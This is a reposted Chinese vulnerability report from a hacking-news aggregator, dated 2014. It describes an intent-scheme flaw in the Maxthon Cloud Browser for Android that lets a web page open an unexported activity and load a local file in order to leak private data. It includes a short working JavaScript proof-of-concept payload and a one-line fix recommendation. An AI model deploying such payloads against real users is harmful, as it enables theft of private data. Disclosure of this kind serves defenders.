记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

傲游云浏览器远程隐私泄露漏洞(需要一定条件)

2014-10-03 13:25

通过intent协议头,浏览器解析,如果处理问题可用来远程打开未导出组件,再通过传参等获取信息

由于intent过滤未严格,导致可以远程打开activity并执行



<script>

location.href = "intent:#Intent;S.url=file:///mnt/sdcard/test.html;component=com.mx.browser/com.mx.browser.navigation.MxFullscreenWebviewActivity;end";

</script>





前提:test.html就是获取隐私的html文件(通过file域),先存放sd卡上

漏洞证明:

1.jpg

修复方案:

对解析intent协议头做处理

知识来源: www.wooyun.org/bugs/wooyun-2014-067798

阅读:58406 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“傲游云浏览器远程隐私泄露漏洞(需要一定条件)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云